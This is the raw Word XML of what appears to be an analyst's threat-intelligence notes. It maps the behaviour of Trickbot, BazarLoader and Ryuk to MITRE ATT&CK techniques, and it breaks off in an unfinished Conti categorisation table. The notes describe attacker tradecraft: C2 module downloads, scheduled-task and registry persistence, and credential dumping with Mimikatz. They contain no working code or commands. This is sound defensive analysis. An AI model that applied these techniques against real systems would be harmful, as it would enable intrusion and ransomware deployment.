      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B4064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A96123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A96123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r w:rsidR="007D5B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43642CBE" w14:textId="43498328" w:rsidR="007D5B5E" w:rsidRDefault="007D5B5E" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="002B03F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B03F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB2762" w14:textId="76396E8B" w:rsidR="00A96123" w:rsidRDefault="00A96123" w:rsidP="001358D1"/>
    <w:p w14:paraId="1452C29C" w14:textId="690FC5F3" w:rsidR="007D5B5E" w:rsidRPr="00417283" w:rsidRDefault="007D5B5E" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00417283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Trickbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D29DE8F" w14:textId="7063BCFC" w:rsidR="00CF0EBC" w:rsidRDefault="00CF0EBC" w:rsidP="001358D1">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0EBC">
        <w:t xml:space="preserve">These activities include credential harvesting, mail exfiltration, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF0EBC">
        <w:t>cryptomining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF0EBC">
        <w:t xml:space="preserve">, point-of-sale data exfiltration, and the deployment of ransomware, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF0EBC">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF0EBC">
        <w:t xml:space="preserve"> and Conti.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55F35A" w14:textId="30EFAAE1" w:rsidR="00CF0EBC" w:rsidRDefault="00CF0EBC" w:rsidP="001358D1">
      <w:r>
        <w:t>Actual attacks not directly referenced here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757B3441" w14:textId="77777777" w:rsidR="00CF0EBC" w:rsidRDefault="00CF0EBC" w:rsidP="001358D1"/>
    <w:p w14:paraId="1519052D" w14:textId="3A8C42CB" w:rsidR="00A91F70" w:rsidRDefault="00CC2EF6" w:rsidP="001358D1">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00A91F70" w:rsidRPr="00A91F70">
        <w:t>Once the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A91F70" w:rsidRPr="00A91F70">
        <w:t>32 or 64 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A91F70" w:rsidRPr="00A91F70">
        <w:t xml:space="preserve"> instruction set), to the infected host’s %APPDATA% or %PROGRAMDATA% directory, such as %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A91F70" w:rsidRPr="00A91F70">
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A91F70" w:rsidRPr="00A91F70">
        <w:t>\Roaming\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A91F70" w:rsidRPr="00A91F70">
        <w:t>winapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396880B7" w14:textId="48559BB3" w:rsidR="00A91F70" w:rsidRDefault="00A91F70" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A91F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 Ingress Tool Transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17430F6D" w14:textId="3A45CA20" w:rsidR="00CC2EF6" w:rsidRDefault="00CC2EF6" w:rsidP="001358D1">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EF6">
        <w:t>Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded GUID</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268090A" w14:textId="314E642E" w:rsidR="00CC2EF6" w:rsidRDefault="00913A76" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00D92414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D92414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1082</w:t>
      </w:r>
      <w:r w:rsidRPr="00913A76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D92414" w:rsidRPr="00D92414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Information Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00D92414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27661267" w14:textId="445AA680" w:rsidR="007D5F24" w:rsidRDefault="007D5F24" w:rsidP="001358D1">
      <w:r w:rsidRPr="007D5F24">
        <w:t>The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B25C08" w14:textId="6CA077BF" w:rsidR="007D5F24" w:rsidRDefault="007D5F24" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="007D5F24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053</w:t>
      </w:r>
      <w:r w:rsidR="007461B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D5F24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Scheduled Task/Job Technique</w:t>
      </w:r>
      <w:r w:rsidR="007461B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Scheduled Task</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631EC3CF" w14:textId="3CCB9115" w:rsidR="00B70D6E" w:rsidRDefault="00B70D6E" w:rsidP="001358D1"/>
    <w:p w14:paraId="6889A473" w14:textId="769BF542" w:rsidR="00417283" w:rsidRDefault="00417283" w:rsidP="001358D1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00417283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>BazarLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00417283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00417283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>BazarBackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45FADF70" w14:textId="1D5DF2D4" w:rsidR="007D5F24" w:rsidRDefault="00C30E8F" w:rsidP="001358D1">
      <w:r w:rsidRPr="00C30E8F">
        <w:t xml:space="preserve">Beginning in approximately early 2020, actors believed to be associated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C30E8F">
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C30E8F">
        <w:t xml:space="preserve"> began using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30E8F">
        <w:t>azarLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C30E8F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C30E8F">
        <w:t>BazarBackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C30E8F">
        <w:t xml:space="preserve"> to infect victim networks</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383976DF" w14:textId="2B5B2A8F" w:rsidR="00C30E8F" w:rsidRDefault="00542D94" w:rsidP="001358D1">
      <w:r w:rsidRPr="00542D94">
        <w:t xml:space="preserve">Deployment of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00542D94">
        <w:t>BazarLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00542D94">
        <w:t xml:space="preserve"> malware typically comes from phishing email and contains the following</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BE43DD">
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="637C7269" w14:textId="43A2F863" w:rsidR="00BE43DD" w:rsidRDefault="00BE43DD" w:rsidP="001358D1">
      <w:r w:rsidRPr="00BE43DD">
        <w:t xml:space="preserve">Bazar activity can be identified by searching the system startup folders and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:t>Userinit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:t xml:space="preserve"> values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:t xml:space="preserve"> registry key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FC182" w14:textId="62E1E679" w:rsidR="00BE43DD" w:rsidRDefault="00BE43DD" w:rsidP="001358D1">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE43DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1547.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE43DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53A23A" w14:textId="77777777" w:rsidR="007E0B73" w:rsidRDefault="007E0B73" w:rsidP="001358D1"/>
    <w:p w14:paraId="4BF01D33" w14:textId="2F2223A7" w:rsidR="00A46447" w:rsidRPr="00A46447" w:rsidRDefault="00A46447" w:rsidP="001358D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46447">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46447">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB65D7" w14:textId="77777777" w:rsidR="00454370" w:rsidRDefault="00691E0D" w:rsidP="00454370">
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidR="00454370">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>RYUK Advisory draft CP June 2019.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15E58662" w14:textId="4AE27891" w:rsidR="00454370" w:rsidRDefault="00454370" w:rsidP="00454370">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>This initial infection (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trickbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F1B7B">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enables the attacker to assess whether the machine presents a ransomware opportunity, and if so, to deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFC58D" w14:textId="237D816F" w:rsidR="00454370" w:rsidRDefault="00454370" w:rsidP="00454370">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a persistent infection. The malware’s installer will attempt to stop certain anti-malware software and install the appropriate version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> depending on a system’s architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FBF2F" w14:textId="0DC58A5E" w:rsidR="00943069" w:rsidRDefault="00A46447" w:rsidP="00454370">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A46447">
        <w:t>Typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A46447">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46447">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46447">
        <w:t xml:space="preserve"> has been deployed as a payload from banking Trojans such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46447">
        <w:t>TrickBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E59EF85" w14:textId="39C881D2" w:rsidR="00C7704A" w:rsidRDefault="00C7704A" w:rsidP="00454370">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00C7704A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C7704A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 Ingress Tool Transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4B82D2" w14:textId="77777777" w:rsidR="008B51D7" w:rsidRDefault="008B51D7" w:rsidP="001358D1">
      <w:r w:rsidRPr="008B51D7">
        <w:t xml:space="preserve">While negotiating the victim network, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B51D7">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B51D7">
        <w:t xml:space="preserve"> actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use </w:t>
      </w:r>
      <w:r w:rsidRPr="008B51D7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B51D7">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B51D7">
        <w:t xml:space="preserve">. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B51D7">
        <w:t>Ryuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B51D7">
        <w:t xml:space="preserve"> actors have been known to use scheduled tasks and service creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705A6BF" w14:textId="0C6F7797" w:rsidR="00640728" w:rsidRDefault="00557979" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">Possible </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00640728">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00640728" w:rsidRPr="00640728">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00640728" w:rsidRPr="00640728">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1555 Credentials from Password Stores</w:t>
      </w:r>
      <w:r w:rsidR="00640728">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43942F44" w14:textId="621F1615" w:rsidR="00640728" w:rsidRDefault="00640728" w:rsidP="001358D1">
      <w:r>
        <w:t xml:space="preserve">Not clear from this report (e.g. Cobalt Strike has ref to T1003.001 </w:t>
      </w:r>
      <w:r w:rsidRPr="00640728">
        <w:t xml:space="preserve">OS Credential Dumping: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00640728">
        <w:t xml:space="preserve">LSASS </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00640728">
        <w:t>Memory</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, T1003.002 </w:t>
      </w:r>
      <w:r w:rsidRPr="00640728">
        <w:t>OS Credential Dumping: Security Account Manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F203C" w14:textId="3CA47A42" w:rsidR="00F974EF" w:rsidRDefault="00F974EF" w:rsidP="001358D1"/>
    <w:p w14:paraId="0CF3155D" w14:textId="64874D07" w:rsidR="00F974EF" w:rsidRDefault="00F974EF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1FEACB" w14:textId="36AB6B75" w:rsidR="00943069" w:rsidRDefault="00943069" w:rsidP="00943069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc110935544"/>
      <w:bookmarkStart w:id="145" w:name="_Toc153480911"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Other</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="694637AD" w14:textId="1BF78E8C" w:rsidR="00562836" w:rsidRPr="00562836" w:rsidRDefault="00691E0D" w:rsidP="00562836">
      <w:hyperlink r:id="rId199" w:history="1">
        <w:r w:rsidR="00562836">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>THREAT ANALYSIS REPORT: Bumblebee Loader – The High Road to Enterprise Domain Control (cybereason.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BCFC486" w14:textId="443894BC" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc153480912"/>
      <w:bookmarkStart w:id="147" w:name="_Toc110935545"/>
      <w:r>
        <w:t>The DFIR Report – Conti Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="4FDB65EA" w14:textId="57AC69A7" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc153480913"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="0C5E0669" w14:textId="767549E0" w:rsidR="00DD1FAC" w:rsidRPr="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:r>
        <w:t>This attack is not specifically attributed to an ATT&amp;CK APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821F48C" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc153480914"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4630">
        <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="19AF42E7" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Categorisation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w14:paraId="52ECB2C4" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A6598D" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC67AEC" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="002D1D50" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C667D97" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="00387DCC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1FAC" w:rsidRPr="00B857D7" w14:paraId="3A517511" w14:textId="77777777" w:rsidTr="00FC027E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D92E9C9" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
